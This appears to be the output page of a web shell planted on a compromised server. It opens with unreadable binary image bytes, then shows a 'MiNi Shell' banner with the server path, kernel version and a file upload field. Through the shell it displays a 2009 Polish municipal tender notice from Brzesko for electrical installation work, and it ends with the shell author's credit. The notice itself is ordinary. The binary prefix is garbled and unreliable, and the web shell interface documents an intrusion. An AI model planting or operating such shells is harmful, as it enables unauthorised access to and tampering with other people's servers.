JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090930/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090930/166233-N-2009.html

<p class="kh_header"><b>Brzesko: Zabudowa dodatkowego układu pomiarowego dla instalacji elektrycznej Starostwa Powiatowego i rozdział istniejącej instalacji w budynku administracyjnym Urzędu Miejskiego i Starostwa Powiatowego w Brzesku</b><br>
<b>Numer ogłoszenia: 166233 - 2009; data zamieszczenia: 30.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Brzeska , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie, tel. 0-14 68 63 100, faks 0-14 66 305 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zabudowa dodatkowego układu pomiarowego dla instalacji elektrycznej Starostwa Powiatowego i rozdział istniejącej instalacji w budynku administracyjnym Urzędu Miejskiego i Starostwa Powiatowego w Brzesku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: Rozdział instalacji elektrycznej i zabudowę dodatkowego układu pomiarowego w budynku administracyjnym Urzędu Miejskiego i Starostwa Powiatowego w Brzesku przy 
ul. Głowackiego 51    w zakresie:
1)	Zabudowa nowego układu pomiarowego wraz z rozdzielnią RGS w punkcie ksero obok Rozdzielni Głównej na parterze budynku
2)	Wykonanie nowych pionów zasilających podrozdzielnie II i III piętra
3)	Modernizacja podrozdzielni piętrowych
4)	Zabudowa modułowego podlicznika energii dla instalacji piwnic budynku

SZCZEGÓŁOWY ZAKRES PRAC PRECYZUJE DOKUMENTACJA TECHNICZNA (ZAŁ. NR 13 ORAZ PRZEDMIAR ROBÓT (ZAŁ. NR 12) - SIWZ

WAŻNE:
Z uwagi na konieczność wykonania robót w czynnym obiekcie prace należy wykonywać pod ścisłym nadzorem inwestorskim i autorskim - w wyznaczonych dniach poza godzinami pracy Urzędu (po godz. 15.30) lub w dniach wolnych od pracy. W szczególności niezbędne jest zachowanie ciągłości zasilania obiektu energią elektryczną w dniach pracy Urzędu.
Prace, których wykonanie jest niezbędne w czasie godzin pracy Urzędu lub związane z czasowym wyłączeniem części lub całości zasilania obiektu energią elektryczną należy uzgodnić z Zamawiającym, z co najmniej 2 - dniowym wyprzedzeniem. Wykonanie prac musi się odbywać w taki sposób, aby zminimalizować uciążliwość i zakłócenia pracy Urzędu.

W ramach przedmiotu zamówienia i ceny zawartej w ofercie Wykonawca zobowiązany jest do:
1.	Realizacji przedmiotu zamówienia zgodnie z wymogami SIWZ, dokumentacji technicznej, umowy oraz wiedzą techniczną i obowiązującymi warunkami technicznymi,
2.	Usunięcia wszystkich ewentualnych kolizji występujących w trakcie realizacji robót i pokrycia kosztów z tym związanych,
3.	Ponoszenia odpowiedzialności za szkody powstałe w trakcie realizacji umowy i ich naprawienia, 
4.	Ponoszenia odpowiedzialności za działania podwykonawców jak za działania własne, 
5.	Po zakończeniu prac teren prac remontowych winien być uporządkowany, a zniszczenia wynikłe 
w trakcie prowadzenia robót winny być naprawione,
6.	Wykonania robót z materiałów własnych, które powinny odpowiadać jakościowo wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie.
7.	Po każdym dniu trwających robót Wykonawca jest zobowiązany posprzątać po sobie miejsce prac i towarzyszące jemu pomieszczenia.

Wykonawca zobowiązany jest do udzielenia minimum 36 miesięcznej gwarancji na wykonanie prace licząc od dnia odbioru końcowego.
Na zastosowane materiały i urządzenia Wykonawca udzieli gwarancji  w zgodzie z gwarancją producenta, lecz nie krótszą niż 24 miesiące oraz w ramach udzielonej gwarancji zapewni serwis gwarancyjny i bieżącą  konserwację.
W okresie gwarancji Wykonawca zobowiązuje się do bezpłatnego:
-	przywrócenia zasilania w terminie do 4 godzin od powiadomienia (telefonicznie lub faksem) przez Zamawiającego o braku zasilania spowodowanego wadliwą pracą instalacji i urządzeń będących przedmiotem zamówienia,
-	usunięcia wad w terminie do 7 dni od powiadomienia go przez Zamawiającego o wadzie, jeżeli będzie to możliwe technicznie lub w innym terminie uzgodnionym przez strony..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunkiem udziału w postępowaniu jest:
a)	złożenie pisemnej oferty na wykonanie zadania wraz z kosztorysem ofertowym z podaniem ceny ofertowej netto i brutto oraz wyszczególnionym podatkiem VAT,
b)	złożenie wszystkich załączników i oświadczeń wymaganych w pkt. VI niniejszej specyfikacji oraz sporządzenie oferty wg wskazań zawartych w pkt X i XI  SIWZ,
c)	wykazanie, że oferent zrealizował należycie przynajmniej jedno podobne zadanie odpowiadające swoim rodzajem przedmiotowi niniejszego przetargu o wartości nie mniejszej niż 10 000,00 zł (brutto)
d)	dysponowanie co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, będącą członkiem Okręgowej Izby Inżynierów Budownictwa,
e)	dysponowanie co najmniej jedną osobą posiadającą świadectwo kwalifikacyjne grupy -E-
f)	     dysponowanie  co najmniej jedną osobą posiadającą świadectwo kwalifikacyjne grupy -D-
2.	Zamawiający oceni spełnienie warunków poprzez sprawdzenie:
a)	czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia,
b)	czy wystawiony jest w okresie ustalonym przez prawo (nie wcześniej niż wskazano)
c)	czy zawiera informacje wymagane dla tego dokumentu,
d)	czy adresatem tego dokument jest wykonawca uczestniczący w przedmiotowym postępowaniu,
e)	czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona (za zgodność z oryginałem) przez osoby uprawnione do reprezentacji wykonawcy lub posiadające stosowne pełnomocnictwa,
f)	    czy złożony dokument jest kompletny

Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk ZP-14 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wymagane dokumenty:
a)	Aktualny odpis z właściwego rejestru albo aktualne  zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
b)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzone odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
c)	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym w zakresie remontu instalacji elektrycznej, stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania (wartość jednej z robót nie niższa niż 10 000,00 zł brutto) - załącznik nr 10 . Do wykazu  należy dołączyć dokumenty potwierdzające, że roboty te zostały wykonane w sposób należyty (referencje, protokół odbioru robót itp.) 
d)	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca - załącznik nr 11
e)	Uprawnienia i zaświadczenia o przynależności do Okręgowej Izby Inżynierów Budownictwa oraz świadectwa kwalifikacyjne
f)	Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
2.	Wymagane oświadczenia:
a)	oświadczenie w trybie art. 22 ustawy Pzp - załącznik Nr 1 SIWZ     
b)	oświadczenie w trybie art. 24 ustawy Pzp - załącznik Nr 2 SIWZ   
c)	oświadczenie uzupełniającego w trybie art. 24ustawy Pzp - załącznik Nr 3 SIWZ  
d)	oświadczenia o akceptacji projektu umowy na takich warunkach jak we wzorze stanowiącym załącznik Nr 5 SIWZ -załącznik Nr 4 SIWZ 
e)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom - załącznik Nr 9 SIWZ
3.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 pkt 2,3 i 5 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( Dz. U Nr. 87 poz. 605 z poźn. zm.)  
a)	składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
-	nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert);
-	nie orzeczono wobec niego zakazu ubiegania się  o zamówienie (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert);
-	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (dokument wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);
b)	składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Pzp (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.brzesko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brzesku 32-800 Brzesko ul. Głowackiego 51. pokój nr 105 tel. 014/68 63 100 w.180 fax 014/66 30 545 w dniach pracy w godz. 7:30 -15:30 e-mail; marzena.grzyb@um.brzesko.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 10:00, miejsce: Urząd Miejski w Brzesku 32-800 Brzesko ul. Głowackiego 51. pokój nr 101 - Sekretariat Burmistrza Brzeska.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com